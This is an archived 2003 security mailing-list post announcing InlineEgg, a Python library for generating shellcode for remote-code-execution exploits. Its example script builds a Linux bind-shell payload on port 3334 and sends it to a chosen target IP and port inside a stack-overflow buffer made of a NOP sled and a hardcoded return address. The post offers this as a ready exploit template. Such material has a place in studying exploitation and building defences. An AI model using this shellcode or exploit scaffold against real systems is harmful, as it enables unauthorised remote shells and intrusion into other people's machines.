lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3F57BE4B.7080207__5286.88973649896$1062723531@corest.com>
Date: Thu, 04 Sep 2003 19:35:55 -0300
From: Gerardo Richarte <gera@...est.com>
To: gera@...est.com
Subject: InlineEgg library release


We'd like to share with you the release of InlineEgg 1.0. the following 
is a reduced version of the
README available at 
http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html,
the same page points to the .tar.gz


Welcome to InlineEgg.

Short version:

    InlineEgg is a collection of python classes (a "library"), that will 
help
you write small assembly programs, either to use as eggs/shellcode for your
exploits or for anything else you may need small assembly programs for. But!
without writing assembly, just using python.

    InlineEgg is now included in CORE IMPACT as another component of its egg
creation framework, but it started as a pretty simple idea to fulfill a 
pretty
simple need. We hope that you find it helpful for your own creations, so we
are releasing it under an opensource license for non commercial uses.

Long version:

A simple need: When writing exploits for remote code execution 
vulnerabilities
    (yes, that's what we do part of the time), you usually need to have 
a small
    assembly program that will be sent to the vulnerable application as 
part of
    the exploiting process. Historically, this small pieces of assembly code
    (eggs) were hardcoded as dead strings in the middle of the exploit. But,
    although having the strings handy gave the exploit writer some 
reusability
    and some flexibility, we sometimes needed more, we even needed the
    possiblity of creating our small assembly programs in runtime, and make
    them addapt to the situation... well, there are lots of different 
solutions
    to the problem, but as I already had some ideas on how to do it, I 
jumped
    into python.

A simple idea: Do something that lets us create small assembly programs by
    concatenating system calls, giving us the possibility of changing the
    arguments to the system calls, and adding more code when needed...

    [...]

--- example2.py -----------------------------------------
#!/usr/bin/python

from inlineegg import *
import socket
import struct
import sys

def listenShellEgg(listen_addr, listen_port):

#   egg = InlineEgg(FreeBSDx86Syscall)
#   egg = InlineEgg(OpenBSDx86Syscall)
   egg = InlineEgg(Linuxx86Syscall)

   # bind to port and listen
   sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM)
   sock = egg.save(sock)                      # save the socket in a 
variable (in stack)
   egg.bind(sock, (listen_addr, listen_port)) # sock is now the 
variable, and it's used from the stack
   egg.listen(sock,1)

   client = egg.accept(sock, 0, 0)
   client = egg.save(client)
   egg.close(sock)

   egg.dup2(client, 0)
   egg.dup2(client, 1)
   egg.dup2(client, 2)
   egg.execve('/bin/sh',('bash','-i'))

   print "Egg len: %d" % len(egg)
   return egg

def main():
   if len(sys.argv) < 3:
      raise Exception, "Usage: %s <target ip> <target port>"

   # connect to target
   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   sock.connect((sys.argv[1], int(sys.argv[2])))

   # create egg
   egg = listenShellEgg('0.0.0.0',3334)

   # exploit

   retAddr = struct.pack('<L',0xbffffc24L)
   toSend  = "\x90"*(1024-len(egg))
   toSend += egg.getCode()
   toSend += retAddr*20

   sock.send(toSend)

main()
---------------------------------------------------------

    [...]

    InlineEgg: 
http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html

    I hope you find it useful and enjoy it,
    gera



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ